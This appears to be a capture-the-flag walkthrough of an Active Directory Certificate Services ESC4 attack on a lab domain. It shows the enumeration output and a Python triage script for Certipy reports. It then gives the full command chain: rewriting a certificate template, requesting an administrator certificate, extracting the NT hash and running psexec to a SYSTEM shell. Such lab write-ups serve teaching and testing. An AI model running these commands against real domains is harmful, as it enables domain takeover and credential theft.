/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC01-CA'
Enterprise CA Name : sequel-DC01-CA
DNS Hostname : DC01.sequel.htb
FullName : DC01.sequel.htb\sequel-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC01-CA, DC=sequel, DC=htb
Cert Thumbprint : 4C4A178BF30A37D8E21D5C5CE634C8552E5769F9
Cert Serial : 152DBD2D8E9C079742C0F3BFF2A211D3
Cert Start Date : 6/8/2024 9:50:40 AM
Cert End Date : 6/8/2124 10:00:40 AM
Cert Chain : CN=sequel-DC01-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates SEQUEL\Domain Admins S-1-5-21-548670397-972687484-3496335370-512
Allow ManageCA, ManageCertificates SEQUEL\Enterprise Admins S-1-5-21-548670397-972687484-3496335370-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : DC01.sequel.htb\sequel-DC01-CA
Template Name : DunderMifflinAuthentication
Schema Version : 2
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
All Extended Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
Object Control Permissions
Owner : SEQUEL\Enterprise Admins S-1-5-21-548670397-972687484-3496335370-519
Full Control Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteOwner Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteDacl Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteProperty Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
Certify completed in 00:00:07.2625288
This Certify output already shows ENROLLEE_SUPPLIES_SUBJECT and Full Control for Authenticated Users on DunderMifflinAuthentication, which is the configuration certipy template writes, so it was evidently captured after the template rewrite further down. The original state of the template is in the Certipy JSON that follows.

certipy find -u 'CA_SVC@sequel.htb' -p 'ThisIsStrong123!..' -dc-ip 10.10.11.51 -vulnerable -enable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250113182419_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250113182419_Certipy.txt'
[*] Saved JSON output to '20250113182419_Certipy.json'

cat 20250113182419_Certipy.json
{
"Certificate Authorities": {
"0": {
"CA Name": "sequel-DC01-CA",
"DNS Name": "DC01.sequel.htb",
"Certificate Subject": "CN=sequel-DC01-CA, DC=sequel, DC=htb",
"Certificate Serial Number": "152DBD2D8E9C079742C0F3BFF2A211D3",
"Certificate Validity Start": "2024-06-08 16:50:40+00:00",
"Certificate Validity End": "2124-06-08 17:00:40+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "SEQUEL.HTB\\Administrators",
"Access Rights": {
"2": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"1": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"512": [
"SEQUEL.HTB\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "DunderMifflinAuthentication",
"Display Name": "Dunder Mifflin Authentication",
"Certificate Authorities": [
"sequel-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireCommonName",
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs"
],
"Private Key Flag": [
"16777216",
"65536"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1000 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SEQUEL.HTB\\Enterprise Admins",
"Full Control Principals": [
"SEQUEL.HTB\\Cert Publishers"
],
"Write Owner Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
],
"Write Dacl Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
],
"Write Property Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
]
}
},
"[!] Vulnerabilities": {
"ESC4": "'SEQUEL.HTB\\\\Cert Publishers' has dangerous permissions"
}
}
}
}

ESC4 attack
Certipy flags ESC4 because Cert Publishers, which ca_svc belongs to, holds Full Control (and Write Owner, Write Dacl and Write Property) on the DunderMifflinAuthentication template. With that, ca_svc can rewrite the template into an ESC1-style one (enrollee supplies the subject, client-authentication EKU, Authenticated Users can enroll) and then request a certificate for any UPN.
- https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4
- https://www.thehacker.recipes/ad/movement/adcs/#escalation-techniques
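Added example (not from the writeup and not Certipy's own code): a triage of Certipy's JSON in Python that applies the ESC4 and ESC1 rules the way a practitioner reads them. A template is ESC4 if a principal that is either a well-known low-privileged group or one of the scanning user's own groups holds Full Control, Write Owner, Write Dacl or Write Property on it; it is ESC1 if it is enabled, lets the enrollee supply the subject, allows client authentication, needs no manager approval or signatures, and such a principal can enroll. It also names the numeric CA access-right keys (1 ManageCA, 2 ManageCertificates, 512 Enroll) that the JSON leaves undecoded. The report is a constructed cut-down of the JSON above plus a hypothetical second template in the state certipy template leaves behind; point it at a real file with python3 triage.py 20250113182419_Certipy.json.

```python
import json

# CA access-right bits behind the numeric keys in Certipy's "Access Rights" (the CertSrv ACL):
# CA_ACCESS_ADMINISTER is ManageCA, CA_ACCESS_OFFICER is ManageCertificates, CA_ACCESS_ENROLL is Enroll.
CA_RIGHTS = {1: "ManageCA", 2: "ManageCertificates", 512: "Enroll"}

# Principals every domain account belongs to: a template that hands these object control
# rights is vulnerable for everybody, not just for whoever ran the scan.
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone", "Users"}
WRITE_RIGHTS = ("Full Control Principals", "Write Owner Principals",
                "Write Dacl Principals", "Write Property Principals")


def short(principal: str) -> str:
    # 'SEQUEL.HTB\Cert Publishers' -> 'Cert Publishers'
    return principal.split("\\")[-1]


def interesting(principal: str, actor_groups: set[str]) -> bool:
    """True for a low-privileged well-known group or a group the scanning user is in."""
    return short(principal) in LOW_PRIV or short(principal) in actor_groups


def decode_ca_rights(ca: dict) -> dict[str, list[str]]:
    """Turn the numeric CA ACL keys into the names Certify prints."""
    return {CA_RIGHTS.get(int(k), k): v for k, v in ca["Permissions"]["Access Rights"].items()}


def esc4(t: dict, actor_groups: set[str]) -> list[tuple[str, str]]:
    """Object control over the template itself held by an interesting principal."""
    perms = t["Permissions"]["Object Control Permissions"]
    hits = []
    for right in WRITE_RIGHTS:
        for p in perms.get(right, []):
            if interesting(p, actor_groups):
                hits.append((short(p), right.replace(" Principals", "")))
    return hits


def esc1(t: dict, actor_groups: set[str]) -> list[str]:
    """Enrollee-supplied subject + client auth + no approval or signatures + enrollable by an interesting principal."""
    if not (t["Enrollee Supplies Subject"] and t["Client Authentication"]):
        return []
    if t["Requires Manager Approval"] or t["Authorized Signatures Required"] > 0:
        return []
    rights = t["Permissions"]["Enrollment Permissions"]["Enrollment Rights"]
    return [short(p) for p in rights if interesting(p, actor_groups)]


def triage(report: dict, actor_groups: set[str]) -> dict[str, dict]:
    """Template name -> findings, for enabled templates only (a disabled template cannot be enrolled)."""
    out = {}
    for t in report["Certificate Templates"].values():
        if not t["Enabled"]:
            continue
        findings = {}
        if e4 := esc4(t, actor_groups):
            findings["ESC4"] = e4
        if e1 := esc1(t, actor_groups):
            findings["ESC1"] = e1
        if findings:
            out[t["Template Name"]] = findings
    return out


# Constructed sample in Certipy's JSON layout: the CA and template from the output above,
# trimmed to the fields used here, plus a hypothetical "RewrittenTemplate" in the state
# `certipy template` writes (enrollee supplies subject, Authenticated Users enroll and control).
SAMPLE_REPORT = {
    "Certificate Authorities": {"0": {
        "CA Name": "sequel-DC01-CA",
        "Permissions": {"Owner": "SEQUEL.HTB\\Administrators", "Access Rights": {
            "2": ["SEQUEL.HTB\\Administrators", "SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"],
            "1": ["SEQUEL.HTB\\Administrators", "SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"],
            "512": ["SEQUEL.HTB\\Authenticated Users"]}}}},
    "Certificate Templates": {
        "0": {"Template Name": "DunderMifflinAuthentication", "Enabled": True, "Client Authentication": True,
              "Enrollee Supplies Subject": False, "Requires Manager Approval": False,
              "Authorized Signatures Required": 0,
              "Permissions": {
                  "Enrollment Permissions": {"Enrollment Rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"]},
                  "Object Control Permissions": {
                      "Owner": "SEQUEL.HTB\\Enterprise Admins",
                      "Full Control Principals": ["SEQUEL.HTB\\Cert Publishers"],
                      "Write Owner Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Cert Publishers"],
                      "Write Dacl Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Cert Publishers"],
                      "Write Property Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Cert Publishers"]}}},
        "1": {"Template Name": "RewrittenTemplate", "Enabled": True, "Client Authentication": True,
              "Enrollee Supplies Subject": True, "Requires Manager Approval": False,
              "Authorized Signatures Required": 0,
              "Permissions": {
                  "Enrollment Permissions": {"Enrollment Rights": ["SEQUEL.HTB\\Authenticated Users"]},
                  "Object Control Permissions": {
                      "Owner": "SEQUEL.HTB\\Enterprise Admins",
                      "Full Control Principals": ["SEQUEL.HTB\\Authenticated Users"]}}},
    },
}

if __name__ == "__main__":
    import sys
    report = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_REPORT
    print(decode_ca_rights(report["Certificate Authorities"]["0"]))
    # ca_svc is in Cert Publishers; run with set() to see what a plain domain user would get
    print(json.dumps(triage(report, {"Cert Publishers"}), indent=2))
```

Run with actor_groups=set() the DunderMifflinAuthentication template disappears from the findings, which is the point Certipy's output makes implicitly: the ESC4 here is specific to Cert Publishers members, not to every domain user, until the template is rewritten.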
certipy template -u "CA_SVC@sequel.htb" -p 'ThisIsStrong123!..' -dc-ip "10.10.11.51" -template DunderMifflinAuthentication -save-old
-save-old writes the current template configuration to a JSON file named after the template; restore it afterwards with certipy template ... -template DunderMifflinAuthentication -configuration <that file>, because the rewritten template lets any authenticated user in the domain request a certificate for an arbitrary UPN.

certipy req -u "CA_SVC@sequel.htb" -p 'ThisIsStrong123!..' -target "sequel-DC01-CA" -ca 'sequel-DC01-CA' -template 'DunderMifflinAuthentication' -upn 'administrator@sequel.htb' -dns 'sequel.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 32
[*] Got certificate with multiple identifications
UPN: 'administrator@sequel.htb'
DNS Host Name: 'sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_sequel.pfx'
Certipy notes the certificate carries no object SID (no szOID_NTDS_CA_SECURITY_EXT). A DC with certificate mapping in full enforcement (KB5014754) would refuse to map it to the account; the PKINIT below succeeding means this DC is still in compatibility mode.

certipy auth -pfx administrator_sequel.pfx -domain sequel.htb -username administrator -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@sequel.htb'
[1] DNS Host Name: 'sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435...:7a8d4e04...
Certipy recovers the NT hash through PKINIT (U2U); pass it straight to psexec:
impacket-psexec administrator@10.10.11.51 -hashes :7a8d4e04...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.51.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file rbVFTkrw.exe
[*] Opening SVCManager on 10.10.11.51.....
[*] Creating service iDeD on 10.10.11.51.....
[*] Starting service iDeD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> type root.txt
767cb01d...